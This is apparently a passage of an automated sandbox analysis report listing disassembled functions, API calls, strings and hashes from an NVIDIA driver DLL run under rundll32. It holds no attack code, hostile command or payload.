SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW, xrefs: 00007FFDFA8DF95C
DeleteNLSNodeUrlRegistryValues, xrefs: 00007FFDFA8DF9F6, 00007FFDFA8DFA05, 00007FFDFA8DFAF6, 00007FFDFA8DFB05

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: DeleteValue$lstrcat
String ID: DeleteNLSNodeUrlRegistryValues$Failed to clear the registry value for alternate server URL$Failed to clear the registry value for server URL$NLSServerURL$NLSStandbyServerURL$NvXDCore.cpp$SOFTWARE\NVIDIA Corporation\Global\GridSW$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW
API String ID: 180844452-2884575481
Opcode ID: 5b5da7a39a30377fd96a2bd621c2668a4b98f95b85f95207946d071c1176ab47
Instruction ID: 92ead6e3831dc6a70ec55f7dce03bf424d1aa92589df45edfc66c0033886b6d5
Opcode Fuzzy Hash: 5b5da7a39a30377fd96a2bd621c2668a4b98f95b85f95207946d071c1176ab47
Instruction Fuzzy Hash: AA613E32B18B8295EB14CB60E8504DD77A4FB84394F900276EAAD97BADEF78D149C740

Function 00007FFDFA8F6CD8 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 129synchronizationthreadCOMMON

Download Yara Rule

APIs

CoRegisterClassObject.OLE32 ref: 00007FFDFA8F6D65
CreateEventW.KERNEL32 ref: 00007FFDFA8F6DC5
CreateThread.KERNEL32 ref: 00007FFDFA8F6DF8
CloseHandle.KERNEL32 ref: 00007FFDFA8F6E0D
CoResumeClassObjects.OLE32 ref: 00007FFDFA8F6E1F
SetEvent.KERNEL32 ref: 00007FFDFA8F6E32
WaitForSingleObject.KERNEL32 ref: 00007FFDFA8F6E43
CloseHandle.KERNEL32 ref: 00007FFDFA8F6E4C
CoRevokeClassObject.OLE32 ref: 00007FFDFA8F6E96

Strings

NvXDCore.cpp, xrefs: 00007FFDFA8F6CE8

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ClassObject$CloseCreateEventHandle$ObjectsRegisterResumeRevokeSingleThreadWait
String ID: NvXDCore.cpp
API String ID: 756728269-624928461
Opcode ID: 7a43a5a631725520e35c25329734bfc67b2278e87e67bfcac4d7afb62722369a
Instruction ID: 9ff8bcc32b062373277b89fc8623dcd2bc9232a0773ccbd1ed0c95de9bee6805
Opcode Fuzzy Hash: 7a43a5a631725520e35c25329734bfc67b2278e87e67bfcac4d7afb62722369a
Instruction Fuzzy Hash: 49517226F1CA8382EB189F15E860A357365BF88B84F284175D96D473ECDFBDE8458300

Function 00007FFDFA8E1D64 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 341COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8DE43C: CoCreateInstance.OLE32 ref: 00007FFDFA8DE46D

SetLastError.KERNEL32 ref: 00007FFDFA8E1F4D
WaitForMultipleObjects.KERNEL32 ref: 00007FFDFA8E2040

Part of subcall function 00007FFDFA8DE05C: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE11F

GetLastError.KERNEL32 ref: 00007FFDFA8E21C0
CloseHandle.KERNEL32 ref: 00007FFDFA8E2287

Strings

wait for sync mutext failed, xrefs: 00007FFDFA8E21AD
Nvidia::UXDriver::Core::NvXDCorePlugin::HandleCplShutdown, xrefs: 00007FFDFA8E1E78, 00007FFDFA8E1E87, 00007FFDFA8E1FAC, 00007FFDFA8E1FBB, 00007FFDFA8E20A1, 00007FFDFA8E20B0, 00007FFDFA8E2185, 00007FFDFA8E2194
waiting for SyncHandles finished with the result, xrefs: 00007FFDFA8E20C9
SyncHandles Are, xrefs: 00007FFDFA8E1EA0
NvXDCore.cpp, xrefs: 00007FFDFA8E1E47, 00007FFDFA8E1E56, 00007FFDFA8E1F7F, 00007FFDFA8E1F8E, 00007FFDFA8E2074, 00007FFDFA8E2083, 00007FFDFA8E2158, 00007FFDFA8E2167
waiting for SyncHandles count, xrefs: 00007FFDFA8E1FD4

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleInit_thread_footerInstanceMultipleObjectsWait
String ID: SyncHandles Are$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::HandleCplShutdown$wait for sync mutext failed$waiting for SyncHandles count$waiting for SyncHandles finished with the result
API String ID: 3807003664-2047345439
Opcode ID: 0b9c20ea03ebd9dbad61d74de9f5408c606bbc6890b3fb68dbf3ab403222f65e
Instruction ID: de87cb7141ba3e1a29ff7a38fb54c66dd6f1b09e7972b8a5655191972d813538
Opcode Fuzzy Hash: 0b9c20ea03ebd9dbad61d74de9f5408c606bbc6890b3fb68dbf3ab403222f65e
Instruction Fuzzy Hash: 81F13832B15B42DAEB18DBA0E4A05EC33B5FB44748B800276DE6D57BADEE38D515C384

Function 00007FFDFA8B8F3C Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 287registryCOMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8B8F9A

Part of subcall function 00007FFDFA8B3C94: RegOpenKeyExW.ADVAPI32 ref: 00007FFDFA8B3CEB

Part of subcall function 00007FFDFA8B433C: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B447F

RegCloseKey.ADVAPI32 ref: 00007FFDFA8B9046
RegCloseKey.ADVAPI32 ref: 00007FFDFA8B9052

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

Part of subcall function 00007FFDFA8B9438: new.LIBCMT ref: 00007FFDFA8B94D2

RegCloseKey.ADVAPI32 ref: 00007FFDFA8B90F2
RegCloseKey.ADVAPI32 ref: 00007FFDFA8B9101
RegCloseKey.ADVAPI32 ref: 00007FFDFA8B9284
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B9400

Strings

LogPrinters, xrefs: 00007FFDFA8B9084, 00007FFDFA8B9093
LogManagers\, xrefs: 00007FFDFA8B91A7
LogFilters, xrefs: 00007FFDFA8B8FC4, 00007FFDFA8B8FD3

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Close$Deallocatestd::_$Open
String ID: LogFilters$LogManagers\$LogPrinters
API String ID: 1882939507-3386155771
Opcode ID: 4de4560469443e222230ed4f737482b2e7f9c7366df2abc6aed90be0a103b973
Instruction ID: bf8c03650ac82553150b0961b1484ef908058b5ac090aca17e377bf0792ea4a8
Opcode Fuzzy Hash: 4de4560469443e222230ed4f737482b2e7f9c7366df2abc6aed90be0a103b973
Instruction Fuzzy Hash: 0AC1B026719AC281EB64DB11E460BAEB364FB85BC0F805176DAAD43BD9DF7CD444C740

Function 00007FFDFA8AD798 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FFDFA8AD85C
RegQueryValueExW.ADVAPI32 ref: 00007FFDFA8AD8A0
RegDeleteValueW.ADVAPI32 ref: 00007FFDFA8AD8C2
RegQueryValueExW.ADVAPI32 ref: 00007FFDFA8AD92B
RegQueryValueExW.ADVAPI32 ref: 00007FFDFA8AD979
RegDeleteValueW.ADVAPI32 ref: 00007FFDFA8AD9A7
RegCloseKey.ADVAPI32 ref: 00007FFDFA8AD9B7
RegDeleteKeyW.ADVAPI32 ref: 00007FFDFA8AD9C5

Strings

DriverError\ErrorCode, xrefs: 00007FFDFA8AD7D2, 00007FFDFA8AD7F8, 00007FFDFA8AD806
DriverError\ErrorContext, xrefs: 00007FFDFA8AD8D4, 00007FFDFA8AD8EE

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Value$DeleteQuery$CloseOpen
String ID: DriverError\ErrorCode$DriverError\ErrorContext
API String ID: 3061106577-343931756
Opcode ID: 5855f0b1a7e1a93ae4dab5344cca6cbf463710f0b4b3c69a4133510457948fe0
Instruction ID: c14697926902cf2e68ac4ff10c994128955a42815576b4b5b2e04d3229c6fd5f
Opcode Fuzzy Hash: 5855f0b1a7e1a93ae4dab5344cca6cbf463710f0b4b3c69a4133510457948fe0
Instruction Fuzzy Hash: 38518237729A4282EB54DF11E520B6A73A4FF84B84F845072ED9F86A98EF3CD544CB10

Function 00007FFDFA8ABAE4 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 117libraryloadermemoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFA8ABB2B
GetProcAddress.KERNEL32 ref: 00007FFDFA8ABB6A
GetProcAddress.KERNEL32 ref: 00007FFDFA8ABB96

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

LocalAlloc.KERNEL32 ref: 00007FFDFA8ABC04
LocalFree.KERNEL32 ref: 00007FFDFA8ABC5D
SetLastError.KERNEL32 ref: 00007FFDFA8ABC87

Strings

SetupDiGetDeviceRegistryPropertyW, xrefs: 00007FFDFA8ABB60
Setupapi.dll, xrefs: 00007FFDFA8ABB3F
SYSTEM\CurrentControlSet\Control\Class\, xrefs: 00007FFDFA8ABC4B
SetupDiDestroyDeviceInfoList, xrefs: 00007FFDFA8ABB8C

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressErrorLastLocalProc$AllocConditionFreeInfoMaskVerifyVersion
String ID: SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
API String ID: 2783935822-1735570339
Opcode ID: ea7982ab65b0be596e67a36e9fb1c312a3c390b9a24ba4bca06979929f529bb5
Instruction ID: fd8c4218b869babe655b258bf24a37f34b8c5424dd6331a420defcf7a2835133
Opcode Fuzzy Hash: ea7982ab65b0be596e67a36e9fb1c312a3c390b9a24ba4bca06979929f529bb5
Instruction Fuzzy Hash: 0A516232B28B5295FB58CB61E864A6833A0FF48B84F5441B6DD6D46BACDF3CE446C310

Function 00007FFDFA8B9570 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

new.LIBCMT ref: 00007FFDFA8B9608
new.LIBCMT ref: 00007FFDFA8B9637
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA8B96A4

Part of subcall function 00007FFDFA8B0A80: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B0AB2

_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8B96B4

Part of subcall function 00007FFDFA971390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFDFA94B7E3), ref: 00007FFDFA97140D
Part of subcall function 00007FFDFA971390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFDFA94B7E3), ref: 00007FFDFA97144C

Strings

StreamManager, xrefs: 00007FFDFA8B964E
DebugOutputLogManager, xrefs: 00007FFDFA8B95F1
ClassName, xrefs: 00007FFDFA8B95B2, 00007FFDFA8B95C1
FileLogManager, xrefs: 00007FFDFA8B9620
No LogManager defined with such name, xrefs: 00007FFDFA8B9699

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Exception$DeallocateFileHeaderRaiseThrow__std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: ClassName$DebugOutputLogManager$FileLogManager$No LogManager defined with such name$StreamManager
API String ID: 2903377776-1756275191
Opcode ID: c4426073df8bf17878242d3d365278b24583b98ba0d4c22a861248d6dc48f0be
Instruction ID: 457b60f9af27d524b894f444ad1f82cd6708213b51bd0f1ad03156505b47fe22
Opcode Fuzzy Hash: c4426073df8bf17878242d3d365278b24583b98ba0d4c22a861248d6dc48f0be
Instruction Fuzzy Hash: E2415132B15A4298EB18DF21D8A19F83364EF54788F815572DA2D876EEEF68E605C340

Function 00007FFDFA8B1D08 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8B1D3B
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFA8B1D55
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8B1D66
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFA8B1D80
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8B1D91
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFA8B1DAB
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8B1DBC

Strings

ios_base::eofbit set, xrefs: 00007FFDFA8B1D9F
ios_base::badbit set, xrefs: 00007FFDFA8B1D49
ios_base::failbit set, xrefs: 00007FFDFA8B1D74

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ExceptionThrow$std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1099746521-1866435925
Opcode ID: 7a8d0049a9d0e06720ebc07020fd1cc616381782ec0e2f7e48c170f5f1d1b8dd
Instruction ID: 8cddc0c968d337382751a821c5e5553277904e07019eb7e01d7b342c7d2f18f0
Opcode Fuzzy Hash: 7a8d0049a9d0e06720ebc07020fd1cc616381782ec0e2f7e48c170f5f1d1b8dd
Instruction Fuzzy Hash: D611A221B2864351EB2CD710D4718F92750AF5078CF9054B2E66D4E9EEDE6CE509C780

Function 00007FFDFA913D18 Relevance: 16.7, APIs: 11, Instructions: 226COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA908344: new.LIBCMT ref: 00007FFDFA9083EE

new.LIBCMT ref: 00007FFDFA913DE8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA913DB1

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA913DCC
new.LIBCMT ref: 00007FFDFA913DD5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA913E10
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA913E2B
new.LIBCMT ref: 00007FFDFA913E34
new.LIBCMT ref: 00007FFDFA913E47

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

std::_Deallocate.LIBCONCRT ref: 00007FFDFA913F2E
std::_Deallocate.LIBCONCRT ref: 00007FFDFA913F42
std::_Deallocate.LIBCONCRT ref: 00007FFDFA91401C

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_$ExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 16389134-0
Opcode ID: 760a318df9c35f645c67c5328d3b34c07a2eba01afe1dc6a1cf2579accc41de9
Instruction ID: d593a13a04394595ed09858eb97c7e429f98080f46bd9a274b7f6c94f2d75b3c
Opcode Fuzzy Hash: 760a318df9c35f645c67c5328d3b34c07a2eba01afe1dc6a1cf2579accc41de9
Instruction Fuzzy Hash: 9B91EE32B05B5995EB44CF66D050AAD33B9AB48BE8B95863ADE3C937D8CF38D411C300

Function 00007FFDFA90A328 Relevance: 16.7, APIs: 11, Instructions: 226COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA908344: new.LIBCMT ref: 00007FFDFA9083EE

new.LIBCMT ref: 00007FFDFA90A3F8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90A3C1

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90A3DC
new.LIBCMT ref: 00007FFDFA90A3E5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90A420
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA90A43B
new.LIBCMT ref: 00007FFDFA90A444
new.LIBCMT ref: 00007FFDFA90A457

Part of subcall function 00007FFDFA946880: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA94689D

std::_Deallocate.LIBCONCRT ref: 00007FFDFA90A53E
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90A552
std::_Deallocate.LIBCONCRT ref: 00007FFDFA90A62C

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Deallocatestd::_$ExceptionThrow$std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID:
API String ID: 16389134-0
Opcode ID: 00dd7d212e8c187aa669aeb44bb095e51aa7e6721c0f0001cb0e7119711b8497
Instruction ID: 6fb84ccc4bd8df43301c9054fd7a19d1cb35621f8a0e648a9d83ece41020f96c
Opcode Fuzzy Hash: 00dd7d212e8c187aa669aeb44bb095e51aa7e6721c0f0001cb0e7119711b8497
Instruction Fuzzy Hash: CD91CD3BB15B5984EB04CF76D460AAC3365AB48BD8B998636DE2D93BD8CF38D411C340

Function 00007FFDFA90C628 Relevance: 16.7, APIs: 11, Instructions: 226COMMON

Download Yara Rule

